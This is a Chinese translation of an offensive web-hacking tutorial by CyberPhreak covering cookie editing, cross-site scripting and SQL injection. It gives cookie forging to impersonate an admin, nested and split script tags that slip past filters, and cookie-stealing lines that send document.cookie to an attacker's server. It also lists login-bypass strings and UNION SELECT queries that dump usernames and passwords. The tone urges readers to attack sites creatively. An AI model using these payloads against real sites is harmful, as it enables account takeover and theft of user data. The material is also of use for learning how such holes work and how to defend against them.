XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
X Web Security - XSS & more X 
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
作者: CyberPhreak
翻譯: 黯魂 [S.S.T]

~介紹

在這篇文章中我將說明所有關(guān)于XSS以及更多相關(guān)的知識.通過這篇文檔,我希望能讓你明白什么是XSS,為什么使用XSS,以及怎樣使用XSS.一旦你學(xué)會了,你將需要發(fā)揮自己的創(chuàng)造力,因為大多數(shù)人都修補了簡單的XSS漏洞.但是他們所忘記做的是修補比XSS的一個字符串更多的漏洞,并且php中特殊安全機制被用來防御XSS,而取代他們自己的方法.同時我將闡述的不僅僅是XSS,而是所有的web安全.

XXXXXXXXXXXXXXXXXXXXX 
X Table OF Contents X 
XXXXXXXXXXXXXXXXXXXXX 

XXXXXXXXXXXXXXXXXXXX 
X Cookie Editing X 
X XSS X 
X SQL Injection X 
XXXXXXXXXXXXXXXXXXXX

~什么是cookie

cookie就是一塊數(shù)據(jù).一旦你瀏覽一個站點并且注冊一個帳號,一個cookie就被設(shè)置以記錄你的信息.cookie僅僅保存你登錄的信息以使站點檢測以前你是否登錄過,如果不是,它就會檢測你的用戶名和密碼的正確性,然后登錄.比如說在一個店鋪,你買了一張票,他們就會給你一張卡.因此你可以進(jìn)進(jìn)出出而不用每次都買票.而cookies比你所能看到的要復(fù)雜得多.店鋪只能記住你一晚上,但是cookies卻能記住你一輩子.

~警告&欺騙

那么現(xiàn)在你知道了cookie是什么...你如何看待它們?事實上,cookie編輯(修改)是最簡單的方法之一.只要有一個瀏覽器,你就能夠查看和編輯cookies,并且只需要一些基礎(chǔ)的javascript知識.打開你的瀏覽器然后隨便去一個網(wǎng)站吧,登錄...現(xiàn)在輸入javascript:alert(document.cookie).這時你應(yīng)該可以看見一個用戶名和密碼.然而大多數(shù)站點現(xiàn)在都不使用cookies,而使用sessions.很遺憾,sessions不能被修改(服務(wù)端可以),不像cookies,一旦你修改了一個cookie你就可以欺騙你自己.現(xiàn)在讓我們開始欺騙...假設(shè)你看到了一個警告框并且看到一些像這樣的內(nèi)容:

strusername=cnsst;strpassword=cnsst

此時假設(shè)你知道’dog’是一個管理員,可是你不知道密碼. 由于脆弱的安全機制你不需要密碼:javascript:void(document.cookie="strusername=dog")
現(xiàn)在輸入:javascript:alert(document.cookie).那幾乎非常接近cookie修改了...

~什么是XSS

XSS,或者CSS,不管你更喜歡怎樣稱呼它,XSS(CSS)都代表著跨站腳本.基本上意思就是你能以任何方式注入腳本,來讓它完成你想要做的.通過XSS你也可以截獲輸入信息,像用戶名,密碼以及cookies.這都將被討論,所以接下來將會有很多例子,我們這篇文章應(yīng)該能夠幫你在XSS上發(fā)揮自己的創(chuàng)造力.

~為什么使用XSS

很明顯的問題,通過XSS你能在客戶端和服務(wù)器端執(zhí)行任何類型的腳本.然而XSS卻不僅僅局限于執(zhí)行腳本上,還能截獲輸入.輸入類似:<input name="name" type="name">
你通過XSS截獲輸入,然后通過一個秘密文件把截獲到的信息發(fā)送向你的站點.而這一切絕不是XSS所能實現(xiàn)的全部作用.XSS還能截獲cookies.Cookies保存著有價值的信息,像用戶名,密碼等等.

~讓我們開始吧…

我假定你知道html和javascript,而php知識也有幫助,但卻不是必要的.讓我們從這個php腳本開始.

XSS--跨站腳本
<html> 
<body> 
<form action="" method="GET"> 
<!-- 我使用的GET方法,因為當(dāng)我們利用的時候更容易練習(xí). --> 
Script: <input name="name" type="name"> 
<input type="submit" value="submit"> 
</form> 
</body> 
</html> 

<?php 
$name = $_GET[’name’]; 
echo("Hello $name"); 
?>



OK,我們應(yīng)該都知道上面的代碼有什么用...這是一個非常奇怪的腳本,沒有一個人會在自己的站點上使用它(至少我沒見過),但是它對初學(xué)者理解原理卻真的很有用.來看看我輸入后所得到的信息:

cnsst
"Hello cnsst!"

引號內(nèi)的信息就是輸出信息..注意看,現(xiàn)在我輸入:
<script>alert(document.cookie)</script> 

那么它將會彈出document.cookie!所以它是易受XSS攻擊的!

現(xiàn)在我們已經(jīng)對XSS有了一點了解,那讓我們理解它.首先,腳本做的是取得你的輸入然后粘貼它.嗯...也就是說我們能輸入任何數(shù)據(jù).所以?等等...任何數(shù)據(jù)...好的,你想問客戶端和服務(wù)器端分別有什么語言? 讓我告訴你,基本上客戶端語言是建立在你客戶端瀏覽器之上的:JavaScript,html, VBScript等等...

服務(wù)器端語言在另一邊,不是建立在你客戶端之上的,而建立在服務(wù)器之上,有php,asp等等...

已有一些方法注入php,稍后我將說明.現(xiàn)在先想想這怎樣才能對我們有幫助?注入javascript?簡單.比如說你正在編寫一個網(wǎng)站程序,由于是你的站點,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因為XSS允許你讓網(wǎng)站運行你想要運行的任何腳本.

讓我們看一個稍微復(fù)雜點的例子!

假設(shè)你已經(jīng)輸入了<script>alert(document.cookie)</script>,并且回顯是這樣的:
scriptalert(document.cookie)/script
或者可能是這樣的:
scriptalertdocument.cookie/script

可以看出更難利用了...不過有很多方法使用XSS,這只是其中一種.而且是其中最爛的方法之一.你看到當(dāng)中的"<>"都被空字符" "替換了.

讓我們繼續(xù)利用:
<<script>>alert(document.cookie)<</script>> 

你的輸出將彈出document.cookie.

現(xiàn)在來看看更狠的:
<<script>>alert((document.cookie))<<//script>>


他們可能會替換所有的,或者只是"<>".所以如果一對不能得以執(zhí)行,另一對就可以.現(xiàn)在,如果你看到:
scriptalertdocument.cookie/script 
或者 <<<script>>>alert(document.cookie)<<</script>>>  

他們可能替換2對來欺騙你,或者替換一些字母.試著用你自己的方法來利用...你輸入:
<script>alert(document.cookie)</script>

輸出像這樣:srplert(document.cookie)srp

仔細(xì)觀察,你就會發(fā)現(xiàn)document.cookie中并沒有什么被替換.為什么呢? 因為他們并不清楚你想要alert什么,以及你想做什么.所以他們只是猜測,就只阻止了"<>"以及script部分.怎么繞過?看看這個:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

所有重復(fù)多余的部分剛好被替換!現(xiàn)在讓我們來點更高級的!

這次他們使用的仍然是替換,但是卻檢查了整個字符串!例如:
<script>alert(document.cookie)</script> 

輸出將是:
scriptalert(document.cookie)script

看到這,你激動地說,"我知道該怎么做了!" OK,讓我們按照你的方法來重新構(gòu)造:
<<script>>alert(document.cookie)<</script>> 

輸出:scriptalert(document.cookie)script. 這時你可能會繼續(xù)增加更多的<>.可是,他們替換了任何"<>",無論你輸入多少個...看到我說"任何"了嗎?使用下面這個例子:

< 
script 
> 
alert 
( 
document 
. 
cookie 
) 
< 
/ 
script 
>


看看它,它沒有替換"<>",它替換代碼關(guān)鍵字.所以即便你寫的是一句沒有"<>"的代碼,將仍然被替換,這就是我們?yōu)槭裁催@樣寫的原因.假如對方使用更嚴(yán)格的標(biāo)準(zhǔn),替換任何類型的代碼,甚至是"alert"! 我們又該怎么改進(jìn)呢?看看這個:
<
s 
c 
r 
i 
p 
t 
> 
a 
l 
e 
r 
t 
( 
d 
o 
c 
u 
m 
e 
n 
t 
. 
c 
o 
o 
k 
i 
e 
) 
< 
/ 
s 
c 
r 
i 
p 
t 
/ 
>

這下應(yīng)該可以了,但是如果他們?nèi)匀惶鎿Q"<",你可以增加2對"<< >>"(并且你可以用任何字符取代document.cookie)

還有更多我可以演示的替換,但是我教你的只是想讓你發(fā)揮自己的創(chuàng)造力.

現(xiàn)在讓我來講講其他XSS方法.前面我們已經(jīng)討論了客戶端XSS,那么現(xiàn)在就來看看服務(wù)器端XSS.

首先讓我說明它們之間的區(qū)別.客戶端是從你瀏覽器經(jīng)解釋語言,如JavaScript (JS) VBScript (VBS)等而看到的.服務(wù)器端XSS是通過來自服務(wù)器端的語言,如php,asp等的XSS.客戶端通過瀏覽器查看,服務(wù)器端通過服務(wù)器查看.

我們已經(jīng)學(xué)會了怎樣構(gòu)造客戶端XSS,而構(gòu)造服務(wù)器端我們必須注入腳本到服務(wù)器上.要完成這個,我們需要找到一個像任何XSS的腳本,但是這個腳本能夠保存你的XSS到服務(wù)器中.現(xiàn)在,假設(shè)你在一個網(wǎng)站上發(fā)表了一篇文章,現(xiàn)在要做的是取代文章,用XSS,為什么我們應(yīng)該用JavaScript?為什么不用php?但是先讓我給你看點東西.
document.forms(0).action ="http://myserver/myscript.php
這既能在服務(wù)器端也能在客戶端,沒有關(guān)系.因此你的腳本將復(fù)制他們所輸入的信息到那個表單中,并保存在我們站點上的一個*.txt文件中.

再次假設(shè)你在網(wǎng)站上注冊了一個帳號,并且可以自定義資料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
或者如果你有空間可以存放指向自定義內(nèi)容的鏈接,你可以輸入:
javascript:location.href="http://myserver/cookie.php"+document.cookie 
這將截獲訪問我們資料的用戶的cookie.這可以用于任何地方而不僅僅在資料上,它只是一個例子.

有時一個站點會回顯你的UserAgent和Referer...現(xiàn)在讓我們在DOS提示符下或者命令行窗口中試一試一些XSS,
telnet example.com 
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1 
User-Agent: <script>alert(document.cookie)</script> 
Referer: <script>alert(document.cookie)</script>


~什么是SQL注入

SQL注入,網(wǎng)站中最大的安全問題之一.那么到底什么是SQL注入?其實也就是注入SQL.現(xiàn)在讓我們來挖掘不同級別的SQL漏洞.假設(shè)你有一個像這樣的登錄頁面:

<html> 
<body> 
<form action="" method="POST"> 
Username: <input name="name" type="name"> 
Password: <input name="password" type="password"> 
<input type="submit" type="submit" value="Submit"> 
</form> 
</body> 
</html>

這里面有一個XSS漏洞,但是不用擔(dān)心它,沒有辦法猜出或者破解出密碼.所以,我們該怎么辦?SQL注入!

最簡單的攻擊是在用戶名和密碼那里輸入"’".如果沒有保護(hù)機制,此時你應(yīng)該得到一個錯誤信息.如果你得到了,它就是極易受攻擊的.可是錯誤信息毫無價值,除非你知道如何利用它.所以,我會給你一個你可以使用的注入列表,以便在你得到一個單引號的錯誤信息時使用.

’=’ 
’OR 1=1-- 
’OR a=a-- 
’OR’

自從人們增強安全性以后,現(xiàn)在這些注入就很難發(fā)揮作用了,但是下面這個列表卻是很多人在安全列表里沒有注意到的:

’OR’’=’ 
’OR"=" 
’OR’=" 
’OR ’=" 
’OR "=’ 
’OR ’’=’ 
’OR ’=’’ 
’OR "=’’ 
’OR ’’="


~
現(xiàn)在讓我說明UNION ALL SELECT聲明,這將選出數(shù)據(jù)庫中的一個表...所顯示的內(nèi)容取決于你所選擇的列.
UNION ALL SELECT username,password FROM users

這個查詢語句將執(zhí)行,但是….如果毫無作用呢?
UNION ALL SELECT username,password FROM users WHERE username=’OR "=’ 
AND password=’OR "=’

你可能使用其他字符來替代’OR "=’以注入存在的注入點.可是首先考慮一下,你是怎么知道表名的?實際上,你發(fā)現(xiàn)了一個SQL漏洞,它給了你錯誤信息,而錯誤信息包含了表名.

一旦你發(fā)現(xiàn)了漏洞,你就會按照習(xí)慣去用類似’OR "=’的方法去進(jìn)行注入,以得到表名.有時候你想從表中查詢一些有用的數(shù)據(jù),你卻不得不選擇所有的表,因為你并不知道所要查詢的數(shù)據(jù)在哪個表里.下面的例子中存在20個不同表名的表,你試圖查詢一個ip的列表:
UNION ALL SELECT 
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs 
WHERE ip=’OR’’="

現(xiàn)在你看到這個了嗎?(我確信你已經(jīng)看到了)
http://example.com/index.php?article=34 
那將瀏覽Id為34的文章...讓我們用"’"替換34:
http://example.com/index.php?article=’ 


現(xiàn)在,記住我所說的,大多數(shù)人都沒有意識到’所帶來的不安全性,你總是能夠嘗試不同的注入方法,這里是一些例子:
http://example.com/index.php?article=’ 
http://example.com/index.php?article=’=’ 
http://example.com/index.php?article=’OR 1=1-- 
http://example.com/index.php?article=’OR a=a-- 
http://example.com/index.php?article=’OR ’=" 
http://example.com/index.php?article=’OR "=’ 
http://example.com/index.php?article=’OR ’’=’ 
http://example.com/index.php?article=’OR ’=’’ 
http://example.com/index.php?article=’OR’’=’ 
http://example.com/index.php?article=’OR"’=’ 
http://example.com/index.php?article=’OR"’’=’ 

盡情發(fā)揮自己的創(chuàng)造力! 

最新評論